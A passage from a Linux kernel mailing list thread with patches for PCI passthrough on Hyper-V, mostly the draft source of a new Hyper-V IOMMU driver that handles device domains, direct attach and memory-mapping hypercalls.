+{ + enum hv_device_type dev_type; + + if (hv_pcidev_is_attached_dev(pdev) || hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + return hv_build_devid_oftype(pdev, dev_type); } /* @@ -221,7 +272,7 @@ int hv_map_msi_interrupt(struct irq_data *data, msidesc = irq_data_get_msi_desc(data); pdev = msi_desc_to_pci_dev(msidesc); - hv_devid = hv_build_devid_type_pci(pdev); + hv_devid.as_uint64 = hv_build_irq_devid(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); return hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, @@ -296,7 +347,8 @@ static int hv_unmap_msi_interrupt(struct pci_dev *pdev, { union hv_device_id hv_devid; - hv_devid = hv_build_devid_type_pci(pdev); + hv_devid.as_uint64 = hv_build_irq_devid(pdev); + return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); } diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index 0d7fdfb25e76..97477c5a8487 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -188,6 +188,20 @@ bool hv_vcpu_is_preempted(int vcpu); static inline void hv_apic_init(void) {} #endif +#if IS_ENABLED(CONFIG_HYPERV_IOMMU) +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ return false; } /* temporary */ +u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type); +#else /* CONFIG_HYPERV_IOMMU */ +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ return false; } + +static inline u64 hv_build_devid_oftype(struct pci_dev *pdev, + enum hv_device_type type) +{ return 0; } + +#endif /* CONFIG_HYPERV_IOMMU */ + u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); struct irq_domain *hv_create_pci_msi_domain(void); -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:26 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add a new file to implement management of device domains, mapping and unmapping of iommu memory, and other iommu_ops to fit within the VFIO framework for PCI passthru on Hyper-V running Linux as root or L1VH parent. This also implements the direct attach mechanism for PCI passthru, which is likewise made to work within the VFIO framework. At a high level, during boot the hypervisor creates a default identity domain and attaches all devices to it. This maps nicely to the Linux iommu subsystem's IOMMU_DOMAIN_IDENTITY domain. As a result, Linux does not need to explicitly ask Hyper-V to attach devices or do maps/unmaps during boot. As mentioned previously, Hyper-V supports two ways to do PCI passthru: 1. Device Domain: root must create a device domain in the hypervisor, and do map/unmap hypercalls for mapping and unmapping guest RAM. All hypervisor communications use a device id of type PCI for identifying and referencing the device. 2. Direct Attach: the hypervisor simply uses the guest's HW page table for mappings, so the host need not do map/unmap device memory hypercalls. As such, direct attach passthru setup during guest boot is extremely fast. A direct attached device must be referenced via its logical device id and not via the PCI device id. At present, the L1VH root/parent only supports direct attaches. Direct attach is also the default in non-L1VH cases because the current device domain implementation has significant performance issues for guests with larger RAM (say, more than 8GB), which unfortunately cannot be addressed in the short term. 
Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- MAINTAINERS | 1 + arch/x86/include/asm/mshyperv.h | 7 +- arch/x86/kernel/pci-dma.c | 2 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 876 ++++++++++++++++++++++++++++++++ include/linux/hyperv.h | 6 + 6 files changed, 890 insertions(+), 4 deletions(-) create mode 100644 drivers/iommu/hyperv-iommu.c diff --git a/MAINTAINERS b/MAINTAINERS index 381a0e086382..63160cee942c 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -11741,6 +11741,7 @@ F: drivers/hid/hid-hyperv.c F: drivers/hv/ F: drivers/infiniband/hw/mana/ F: drivers/input/serio/hyperv-keyboard.c +F: drivers/iommu/hyperv-iommu.c F: drivers/iommu/hyperv-irq.c F: drivers/net/ethernet/microsoft/ F: drivers/net/hyperv/ diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index 97477c5a8487..e4ccdbbf1d12 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -189,16 +189,17 @@ static inline void hv_apic_init(void) {} #endif #if IS_ENABLED(CONFIG_HYPERV_IOMMU) -static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) -{ return false; } /* temporary */ +bool hv_pcidev_is_attached_dev(struct pci_dev *pdev); u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type); +u64 hv_iommu_get_curr_partid(void); #else /* CONFIG_HYPERV_IOMMU */ static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) { return false; } - static inline u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type) { return 0; } +static inline u64 hv_iommu_get_curr_partid(void) +{ return HV_PARTITION_ID_INVALID; } #endif /* CONFIG_HYPERV_IOMMU */ diff --git a/arch/x86/kernel/pci-dma.c b/arch/x86/kernel/pci-dma.c index 6267363e0189..cfeee6505e17 100644 --- a/arch/x86/kernel/pci-dma.c +++ b/arch/x86/kernel/pci-dma.c @@ -8,6 +8,7 @@ #include <linux/gfp.h> #include <linux/pci.h> #include <linux/amd-iommu.h> +#include <linux/hyperv.h> #include <asm/proto.h> #include <asm/dma.h> 
@@ -105,6 +106,7 @@ void __init pci_iommu_alloc(void) gart_iommu_hole_init(); amd_iommu_detect(); detect_intel_iommu(); + hv_iommu_detect(); swiotlb_init(x86_swiotlb_enable, x86_swiotlb_flags); } diff --git a/drivers/iommu/Makefile b/drivers/iommu/Makefile index 598c39558e7d..cc9774864b00 100644 --- a/drivers/iommu/Makefile +++ b/drivers/iommu/Makefile @@ -30,7 +30,7 @@ obj-$(CONFIG_TEGRA_IOMMU_SMMU) += tegra-smmu.o obj-$(CONFIG_EXYNOS_IOMMU) += exynos-iommu.o obj-$(CONFIG_FSL_PAMU) += fsl_pamu.o fsl_pamu_domain.o obj-$(CONFIG_S390_IOMMU) += s390-iommu.o -obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o +obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o hyperv-iommu.o obj-$(CONFIG_VIRTIO_IOMMU) += virtio-iommu.o obj-$(CONFIG_IOMMU_SVA) += iommu-sva.o obj-$(CONFIG_IOMMU_IOPF) += io-pgfault.o diff --git a/drivers/iommu/hyperv-iommu.c b/drivers/iommu/hyperv-iommu.c new file mode 100644 index 000000000000..548483fec6b1 --- /dev/null +++ b/drivers/iommu/hyperv-iommu.c @@ -0,0 +1,876 @@ +// SPDX-License-Identifier: GPL-2.0 +/* + * Hyper-V root vIOMMU driver. + * Copyright (C) 2026, Microsoft, Inc. + */ + +#include <linux/module.h> +#include <linux/pci.h> +#include <linux/dmar.h> +#include <linux/dma-map-ops.h> +#include <linux/interval_tree.h> +#include <linux/hyperv.h> +#include "dma-iommu.h" +#include <asm/iommu.h> +#include <asm/mshyperv.h> + +/* We will not claim these PCI devices, eg hypervisor needs it for debugger */ +static char *pci_devs_to_skip; +static int __init hv_iommu_setup_skip(char *str) +{ + pci_devs_to_skip = str; + + return 0; +} +/* hv_iommu_skip=(SSSS:BB:DD.F)(SSSS:BB:DD.F) */ +__setup("hv_iommu_skip=", hv_iommu_setup_skip); + +bool hv_no_attdev; /* disable direct device attach for passthru */ +EXPORT_SYMBOL_GPL(hv_no_attdev); +static int __init setup_hv_no_attdev(char *str) +{ + hv_no_attdev = true; + return 0; +} +__setup("hv_no_attdev", setup_hv_no_attdev); + +/* Iommu device that we export to the world. 
HyperV supports max of one */ +static struct iommu_device hv_virt_iommu; + +struct hv_domain { + struct iommu_domain iommu_dom; + u32 domid_num; /* as opposed to domain_id.type */ + u32 num_attchd; /* number of currently attached devices */ + bool attached_dom; /* is this direct attached dom? */ + spinlock_t mappings_lock; /* protects mappings_tree */ + struct rb_root_cached mappings_tree; /* iova to pa lookup tree */ +}; + +#define to_hv_domain(d) container_of(d, struct hv_domain, iommu_dom) + +struct hv_iommu_mapping { + phys_addr_t paddr; + struct interval_tree_node iova; + u32 flags; +}; + +/* + * By default, during boot the hypervisor creates one Stage 2 (S2) default + * domain. Stage 2 means that the page table is controlled by the hypervisor. + * S2 default: access to entire root partition memory. This for us easily + * maps to IOMMU_DOMAIN_IDENTITY in the iommu subsystem, and + * is called HV_DEVICE_DOMAIN_ID_S2_DEFAULT in the hypervisor. + * + * Device Management: + * There are two ways to manage device attaches to domains: + * 1. Domain Attach: A device domain is created in the hypervisor, the + * device is attached to this domain, and then memory + * ranges are mapped in the map callbacks. + * 2. Direct Attach: No need to create a domain in the hypervisor for direct + * attached devices. A hypercall is made to tell the + * hypervisor to attach the device to a guest. There is + * no need for explicit memory mappings because the + * hypervisor will just use the guest HW page table. + * + * Since a direct attach is much faster, it is the default. This can be + * changed via hv_no_attdev. + * + * L1VH: hypervisor only supports direct attach. + */ + +/* + * Create dummy domain to correspond to hypervisor prebuilt default identity + * domain (dummy because we do not make hypercall to create them). 
+ */ +static struct hv_domain hv_def_identity_dom; + +static bool hv_special_domain(struct hv_domain *hvdom) +{ + return hvdom == &hv_def_identity_dom; +} + +struct iommu_domain_geometry default_geometry = (struct iommu_domain_geometry) { + .aperture_start = 0, + .aperture_end = -1UL, + .force_aperture = true, +}; + +/* + * Since the relevant hypercalls can only fit less than 512 PFNs in the pfn + * array, report 1M max. + */ +#define HV_IOMMU_PGSIZES (SZ_4K | SZ_1M) + +static u32 unique_id; /* unique numeric id of a new domain */ + +static void hv_iommu_detach_dev(struct iommu_domain *immdom, + struct device *dev); +static size_t hv_iommu_unmap_pages(struct iommu_domain *immdom, ulong iova, + size_t pgsize, size_t pgcount, + struct iommu_iotlb_gather *gather); + +/* + * If the current thread is a VMM thread, return the partition id of the VM it + * is managing, else return HV_PARTITION_ID_INVALID. + */ +u64 hv_iommu_get_curr_partid(void) +{ + u64 (*fn)(pid_t pid); + u64 partid; + + fn = symbol_get(mshv_pid_to_partid); + if (!fn) + return HV_PARTITION_ID_INVALID; + + partid = fn(current->tgid); + symbol_put(mshv_pid_to_partid); + + return partid; +} + +/* If this is a VMM thread, then this domain is for a guest VM */ +static bool hv_curr_thread_is_vmm(void) +{ + return hv_iommu_get_curr_partid() != HV_PARTITION_ID_INVALID; +} + +static bool hv_iommu_capable(struct device *dev, enum iommu_cap cap) +{ + switch (cap) { + case IOMMU_CAP_CACHE_COHERENCY: + return true; + default: + return false; + } + return false; +} + +/* + * Check if given pci device is a direct attached device. Caller must have + * verified pdev is a valid pci device. 
+ */ +bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ + struct iommu_domain *iommu_domain; + struct hv_domain *hvdom; + struct device *dev = &pdev->dev; + + iommu_domain = iommu_get_domain_for_dev(dev); + if (iommu_domain) { + hvdom = to_hv_domain(iommu_domain); + return hvdom->attached_dom; + } + + return false; +} +EXPORT_SYMBOL_GPL(hv_pcidev_is_attached_dev); + +/* Create a new device domain in the hypervisor */ +static int hv_iommu_create_hyp_devdom(struct hv_domain *hvdom) +{ + u64 status; + unsigned long flags; + struct hv_input_device_domain *ddp; + struct hv_input_create_device_domain *input; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + ddp = &input->device_domain; + ddp->partition_id = HV_PARTITION_ID_SELF; + ddp->domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + ddp->domain_id.id = hvdom->domid_num; + + input->create_device_domain_flags.forward_progress_required = 1; + input->create_device_domain_flags.inherit_owning_vtl = 0; + + status = hv_do_hypercall(HVCALL_CREATE_DEVICE_DOMAIN, input, NULL); + + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* During boot, all devices are attached to this */ +static struct iommu_domain *hv_iommu_domain_alloc_identity(struct device *dev) +{ + return &hv_def_identity_dom.iommu_dom; +} + +static struct iommu_domain *hv_iommu_domain_alloc_paging(struct device *dev) +{ + struct hv_domain *hvdom; + int rc; + + if (hv_l1vh_partition() && !hv_curr_thread_is_vmm() && !hv_no_attdev) { + pr_err("Hyper-V: l1vh iommu does not support host devices\n"); + return NULL; + } + + hvdom = kzalloc(sizeof(struct hv_domain), GFP_KERNEL); + if (hvdom == NULL) + goto out; + + spin_lock_init(&hvdom->mappings_lock); + hvdom->mappings_tree = RB_ROOT_CACHED; + + if (++unique_id == HV_DEVICE_DOMAIN_ID_S2_DEFAULT) /* ie, 0 */ + goto out_free; + + hvdom->domid_num = unique_id; + 
hvdom->iommu_dom.geometry = default_geometry; + hvdom->iommu_dom.pgsize_bitmap = HV_IOMMU_PGSIZES; + + /* For guests, by default we do direct attaches, so no domain in hyp */ + if (hv_curr_thread_is_vmm() && !hv_no_attdev) + hvdom->attached_dom = true; + else { + rc = hv_iommu_create_hyp_devdom(hvdom); + if (rc) + goto out_free_id; + } + + return &hvdom->iommu_dom; + +out_free_id: + unique_id--; +out_free: + kfree(hvdom); +out: + return NULL; +} + +static void hv_iommu_domain_free(struct iommu_domain *immdom) +{ + struct hv_domain *hvdom = to_hv_domain(immdom); + unsigned long flags; + u64 status; + struct hv_input_delete_device_domain *input; + + if (hv_special_domain(hvdom)) + return; + + if (hvdom->num_attchd) { + pr_err("Hyper-V: can't free busy iommu domain (%p)\n", immdom); + return; + } + + if (!hv_curr_thread_is_vmm() || hv_no_attdev) { + struct hv_input_device_domain *ddp; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + ddp = &input->device_domain; + memset(input, 0, sizeof(*input)); + + ddp->partition_id = HV_PARTITION_ID_SELF; + ddp->domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + ddp->domain_id.id = hvdom->domid_num; + + status = hv_do_hypercall(HVCALL_DELETE_DEVICE_DOMAIN, input, + NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + } + + kfree(hvdom); +} + +/* Attach a device to a domain previously created in the hypervisor */ +static int hv_iommu_att_dev2dom(struct hv_domain *hvdom, struct pci_dev *pdev) +{ + unsigned long flags; + u64 status; + enum hv_device_type dev_type; + struct hv_input_attach_device_domain *input; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->device_domain.partition_id = HV_PARTITION_ID_SELF; + input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + input->device_domain.domain_id.id = hvdom->domid_num; + + /* NB: Upon guest shutdown, device is re-attached to the 
default domain + * without explicit detach. + */ + if (hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + input->device_id.as_uint64 = hv_build_devid_oftype(pdev, dev_type); + + status = hv_do_hypercall(HVCALL_ATTACH_DEVICE_DOMAIN, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* Caller must have validated that dev is a valid pci dev */ +static int hv_iommu_direct_attach_device(struct pci_dev *pdev) +{ + struct hv_input_attach_device *input; + u64 status; + int rc; + unsigned long flags; + union hv_device_id host_devid; + enum hv_device_type dev_type; + u64 ptid = hv_iommu_get_curr_partid(); + + if (ptid == HV_PARTITION_ID_INVALID) { + pr_err("Hyper-V: Invalid partition id in direct attach\n"); + return -EINVAL; + } + + if (hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + host_devid.as_uint64 = hv_build_devid_oftype(pdev, dev_type); + + do { + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + input->partition_id = ptid; + input->device_id = host_devid; + + /* Hypervisor associates logical_id with this device, and in + * some hypercalls like retarget interrupts, logical_id must be + * used instead of the BDF. It is a required parameter. 
+ */ + input->attdev_flags.logical_id = 1; + input->logical_devid = + hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_LOGICAL); + + status = hv_do_hypercall(HVCALL_ATTACH_DEVICE, input, NULL); + local_irq_restore(flags); + + if (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY) { + rc = hv_call_deposit_pages(NUMA_NO_NODE, ptid, 1); + if (rc) + break; + } + } while (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* This to attach a device to both host app (like DPDK) and a guest VM */ +static int hv_iommu_attach_dev(struct iommu_domain *immdom, struct device *dev, + struct iommu_domain *old) +{ + struct pci_dev *pdev; + int rc; + struct hv_domain *hvdom_new = to_hv_domain(immdom); + struct hv_domain *hvdom_prev = dev_iommu_priv_get(dev); + + /* Only allow PCI devices for now */ + if (!dev_is_pci(dev)) + return -EINVAL; + + pdev = to_pci_dev(dev); + + /* l1vh does not support host device (eg DPDK) passthru */ + if (hv_l1vh_partition() && !hv_special_domain(hvdom_new) && + !hvdom_new->attached_dom) + return -EINVAL; + + /* + * VFIO does not do explicit detach calls, hence check first if we need + * to detach first. Also, in case of guest shutdown, it's the VMM + * thread that attaches it back to the hv_def_identity_dom, and + * hvdom_prev will not be null then. It is null during boot. 
+ */ + if (hvdom_prev) + if (!hv_l1vh_partition() || !hv_special_domain(hvdom_prev)) + hv_iommu_detach_dev(&hvdom_prev->iommu_dom, dev); + + if (hv_l1vh_partition() && hv_special_domain(hvdom_new)) { + dev_iommu_priv_set(dev, hvdom_new); /* sets "private" field */ + return 0; + } + + if (hvdom_new->attached_dom) + rc = hv_iommu_direct_attach_device(pdev); + else + rc = hv_iommu_att_dev2dom(hvdom_new, pdev); + + if (rc && hvdom_prev) { + int rc1; + + if (hvdom_prev->attached_dom) + rc1 = hv_iommu_direct_attach_device(pdev); + else + rc1 = hv_iommu_att_dev2dom(hvdom_prev, pdev); + + if (rc1) + pr_err("Hyper-V: iommu could not restore orig device state.. dev:%s\n", + dev_name(dev)); + } + + if (rc == 0) { + dev_iommu_priv_set(dev, hvdom_new); /* sets "private" field */ + hvdom_new->num_attchd++; + } + + return rc; +} + +static void hv_iommu_det_dev_from_guest(struct hv_domain *hvdom, + struct pci_dev *pdev) +{ + struct hv_input_detach_device *input; + u64 status, log_devid; + unsigned long flags; + + log_devid = hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_LOGICAL); + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->partition_id = hv_iommu_get_curr_partid(); + input->logical_devid = log_devid; + status = hv_do_hypercall(HVCALL_DETACH_DEVICE, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); +} + +static void hv_iommu_det_dev_from_dom(struct hv_domain *hvdom, + struct pci_dev *pdev) +{ + u64 status, devid; + unsigned long flags; + struct hv_input_detach_device_domain *input; + + devid = hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_PCI); + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->partition_id = HV_PARTITION_ID_SELF; + input->device_id.as_uint64 = devid; + status = hv_do_hypercall(HVCALL_DETACH_DEVICE_DOMAIN, input, NULL); + local_irq_restore(flags); + + if 
(!hv_result_success(status)) + hv_status_err(status, "\n"); +} + +static void hv_iommu_detach_dev(struct iommu_domain *immdom, struct device *dev) +{ + struct pci_dev *pdev; + struct hv_domain *hvdom = to_hv_domain(immdom); + + /* See the attach function, only PCI devices for now */ + if (!dev_is_pci(dev)) + return; + + if (hvdom->num_attchd == 0) + pr_warn("Hyper-V: num_attchd is zero (%s)\n", dev_name(dev)); + + pdev = to_pci_dev(dev); + + if (hvdom->attached_dom) { + hv_iommu_det_dev_from_guest(hvdom, pdev); + + /* Do not reset attached_dom, hv_iommu_unmap_pages happens + * next. + */ + } else { + hv_iommu_det_dev_from_dom(hvdom, pdev); + } + + hvdom->num_attchd--; +} + +static int hv_iommu_add_tree_mapping(struct hv_domain *hvdom, + unsigned long iova, phys_addr_t paddr, + size_t size, u32 flags) +{ + unsigned long irqflags; + struct hv_iommu_mapping *mapping; + + mapping = kzalloc(sizeof(*mapping), GFP_ATOMIC); + if (!mapping) + return -ENOMEM; + + mapping->paddr = paddr; + mapping->iova.start = iova; + mapping->iova.last = iova + size - 1; + mapping->flags = flags; + + spin_lock_irqsave(&hvdom->mappings_lock, irqflags); + interval_tree_insert(&mapping->iova, &hvdom->mappings_tree); + spin_unlock_irqrestore(&hvdom->mappings_lock, irqflags); + + return 0; +} + +static size_t hv_iommu_del_tree_mappings(struct hv_domain *hvdom, + unsigned long iova, size_t size) +{ + unsigned long flags; + size_t unmapped = 0; + unsigned long last = iova + size - 1; + struct hv_iommu_mapping *mapping = NULL; + struct interval_tree_node *node, *next; + + spin_lock_irqsave(&hvdom->mappings_lock, flags); + next = interval_tree_iter_first(&hvdom->mappings_tree, iova, last); + while (next) { + node = next; + mapping = container_of(node, struct hv_iommu_mapping, iova); + next = interval_tree_iter_next(node, iova, last); + + /* Trying to split a mapping? Not supported for now. 
+	 */
+		if (mapping->iova.start < iova)
+			break;
+
+		unmapped += mapping->iova.last - mapping->iova.start + 1;
+
+		interval_tree_remove(node, &hvdom->mappings_tree);
+		kfree(mapping);
+	}
+	spin_unlock_irqrestore(&hvdom->mappings_lock, flags);
+
+	return unmapped;
+}
+
+/* Return: must return exact status from the hypercall without changes */
+static u64 hv_iommu_map_pgs(struct hv_domain *hvdom,
+			    unsigned long iova, phys_addr_t paddr,
+			    unsigned long npages, u32 map_flags)
+{
+	u64 status;
+	int i;
+	struct hv_input_map_device_gpa_pages *input;
+	unsigned long flags, pfn = paddr >> HV_HYP_PAGE_SHIFT;
+
+	local_irq_save(flags);
+	input = *this_cpu_ptr(hyperv_pcpu_input_arg);
+	memset(input, 0, sizeof(*input));
+
+	input->device_domain.partition_id = HV_PARTITION_ID_SELF;
+	input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2;
+	input->device_domain.domain_id.id = hvdom->domid_num;
+	input->map_flags = map_flags;
+	input->target_device_va_base = iova;
+
+	pfn = paddr >> HV_HYP_PAGE_SHIFT;
+	for (i = 0; i < npages; i++, pfn++)
+		input->gpa_page_list[i] = pfn;
+
+	status = hv_do_rep_hypercall(HVCALL_MAP_DEVICE_GPA_PAGES, npages, 0,
+				     input, NULL);
+
+	local_irq_restore(flags);
+	return status;
+}
+
+/*
+ * The core VFIO code loops over memory ranges calling this function with
+ * the largest size from HV_IOMMU_PGSIZES. cond_resched() is in vfio_iommu_map.
+ */
+static int hv_iommu_map_pages(struct iommu_domain *immdom, ulong iova,
+			      phys_addr_t paddr, size_t pgsize, size_t pgcount,
+			      int prot, gfp_t gfp, size_t *mapped)
+{
+	u32 map_flags;
+	int ret;
+	u64 status;
+	unsigned long npages, done = 0;
+	struct hv_domain *hvdom = to_hv_domain(immdom);
+	size_t size = pgsize * pgcount;
+
+	map_flags = HV_MAP_GPA_READABLE; /* required */
+	map_flags |= prot & IOMMU_WRITE ? HV_MAP_GPA_WRITABLE : 0;
+
+	ret = hv_iommu_add_tree_mapping(hvdom, iova, paddr, size, map_flags);
+	if (ret)
+		return ret;
+
+	if (hvdom->attached_dom) {
+		*mapped = size;
+		return 0;
+	}
+
+	npages = size >> HV_HYP_PAGE_SHIFT;
+	while (done < npages) {
+		ulong completed, remain = npages - done;
+
+		status = hv_iommu_map_pgs(hvdom, iova, paddr, remain,
+					  map_flags);
+
+		completed = hv_repcomp(status);
+		done = done + completed;
+		iova = iova + (completed << HV_HYP_PAGE_SHIFT);
+		paddr = paddr + (completed << HV_HYP_PAGE_SHIFT);
+
+		if (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY) {
+			ret = hv_call_deposit_pages(NUMA_NO_NODE,
+						    hv_current_partition_id,
+						    256);
+			if (ret)
+				break;
+		}
+		if (!hv_result_success(status))
+			break;
+	}
+
+	if (!hv_result_success(status)) {
+		size_t done_size = done << HV_HYP_PAGE_SHIFT;
+
+		hv_status_err(status, "pgs:%lx/%lx iova:%lx\n",
+			      done, npages, iova);
+		/*
+		 * lookup tree has all mappings [0 - size-1]. Below unmap will
+		 * only remove from [0 - done], we need to remove second chunk
+		 * [done+1 - size-1].
+		 */
+		hv_iommu_del_tree_mappings(hvdom, iova, size - done_size);
+		hv_iommu_unmap_pages(immdom, iova - done_size, pgsize,
+				     done, NULL);
+		if (mapped)
+			*mapped = 0;
+	} else
+		if (mapped)
+			*mapped = size;
+
+	return hv_result_to_errno(status);
+}
+
+static size_t hv_iommu_unmap_pages(struct iommu_domain *immdom, ulong iova,
+				   size_t pgsize, size_t pgcount,
+				   struct iommu_iotlb_gather *gather)
+{
+	unsigned long flags, npages;
+	struct hv_input_unmap_device_gpa_pages *input;
+	u64 status;
+	struct hv_domain *hvdom = to_hv_domain(immdom);
+	size_t unmapped, size = pgsize * pgcount;
+
+	unmapped = hv_iommu_del_tree_mappings(hvdom, iova, size);
+	if (unmapped < size)
+		pr_err("%s: could not delete all mappings (%lx:%lx/%lx)\n",
+		       __func__, iova, unmapped, size);
+
+	if (hvdom->attached_dom)
+		return size;
+
+	npages = size >> HV_HYP_PAGE_SHIFT;
+
+	local_irq_save(flags);
+	input = *this_cpu_ptr(hyperv_pcpu_input_arg);
+	memset(input, 0, sizeof(*input));
+
+	input->device_domain.partition_id = HV_PARTITION_ID_SELF;
+	input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2;
+	input->device_domain.domain_id.id = hvdom->domid_num;
+	input->target_device_va_base = iova;
+
+	status = hv_do_rep_hypercall(HVCALL_UNMAP_DEVICE_GPA_PAGES, npages,
+				     0, input, NULL);
+	local_irq_restore(flags);
+
+	if (!hv_result_success(status))
+		hv_status_err(status, "\n");
+
+	return unmapped;
+}
+
+static phys_addr_t hv_iommu_iova_to_phys(struct iommu_domain *immdom,
+					 dma_addr_t iova)
+{
+	u64 paddr = 0;
+	unsigned long flags;
+	struct hv_iommu_mapping *mapping;
+	struct interval_tree_node *node;
+	struct hv_domain *hvdom = to_hv_domain(immdom);
+
+	spin_lock_irqsave(&hvdom->mappings_lock, flags);
+	node = interval_tree_iter_first(&hvdom->mappings_tree, iova, iova);
+	if (node) {
+		mapping = container_of(node, struct hv_iommu_mapping, iova);
+		paddr = mapping->paddr + (iova - mapping->iova.start);
+	}
+	spin_unlock_irqrestore(&hvdom->mappings_lock, flags);
+
+	return paddr;
+}
+
+/*
+ * Currently, hypervisor does not provide list of devices it is using
+ * dynamically. So use this to allow users to manually specify devices that
+ * should be skipped. (eg. hypervisor debugger using some network device).
+ */
+static struct iommu_device *hv_iommu_probe_device(struct device *dev)
+{
+	if (!dev_is_pci(dev))
+		return ERR_PTR(-ENODEV);
+
+	if (pci_devs_to_skip && *pci_devs_to_skip) {
+		int rc, pos = 0;
+		int parsed;
+		int segment, bus, slot, func;
+		struct pci_dev *pdev = to_pci_dev(dev);
+
+		do {
+			parsed = 0;
+
+			rc = sscanf(pci_devs_to_skip + pos, " (%x:%x:%x.%x) %n",
+				    &segment, &bus, &slot, &func, &parsed);
+			if (rc)
+				break;
+			if (parsed <= 0)
+				break;
+
+			if (pci_domain_nr(pdev->bus) == segment &&
+			    pdev->bus->number == bus &&
+			    PCI_SLOT(pdev->devfn) == slot &&
+			    PCI_FUNC(pdev->devfn) == func) {
+
+				dev_info(dev, "skipped by Hyper-V IOMMU\n");
+				return ERR_PTR(-ENODEV);
+			}
+			pos += parsed;
+
+		} while (pci_devs_to_skip[pos]);
+	}
+
+	/* Device will be explicitly attached to the default domain, so no need
+	 * to do dev_iommu_priv_set() here.
+	 */
+
+	return &hv_virt_iommu;
+}
+
+static void hv_iommu_probe_finalize(struct device *dev)
+{
+	struct iommu_domain *immdom = iommu_get_domain_for_dev(dev);
+
+	if (immdom && immdom->type == IOMMU_DOMAIN_DMA)
+		iommu_setup_dma_ops(dev);
+	else
+		set_dma_ops(dev, NULL);
+}
+
+static void hv_iommu_release_device(struct device *dev)
+{
+	struct hv_domain *hvdom = dev_iommu_priv_get(dev);
+
+	/* Need to detach device from device domain if necessary.
+	 */
+	if (hvdom)
+		hv_iommu_detach_dev(&hvdom->iommu_dom, dev);
+
+	dev_iommu_priv_set(dev, NULL);
+	set_dma_ops(dev, NULL);
+}
+
+static struct iommu_group *hv_iommu_device_group(struct device *dev)
+{
+	if (dev_is_pci(dev))
+		return pci_device_group(dev);
+	else
+		return generic_device_group(dev);
+}
+
+static int hv_iommu_def_domain_type(struct device *dev)
+{
+	/* The hypervisor always creates this by default during boot */
+	return IOMMU_DOMAIN_IDENTITY;
+}
+
+static struct iommu_ops hv_iommu_ops = {
+	.capable = hv_iommu_capable,
+	.domain_alloc_identity = hv_iommu_domain_alloc_identity,
+	.domain_alloc_paging = hv_iommu_domain_alloc_paging,
+	.probe_device = hv_iommu_probe_device,
+	.probe_finalize = hv_iommu_probe_finalize,
+	.release_device = hv_iommu_release_device,
+	.def_domain_type = hv_iommu_def_domain_type,
+	.device_group = hv_iommu_device_group,
+	.default_domain_ops = &(const struct iommu_domain_ops) {
+		.attach_dev = hv_iommu_attach_dev,
+		.map_pages = hv_iommu_map_pages,
+		.unmap_pages = hv_iommu_unmap_pages,
+		.iova_to_phys = hv_iommu_iova_to_phys,
+		.free = hv_iommu_domain_free,
+	},
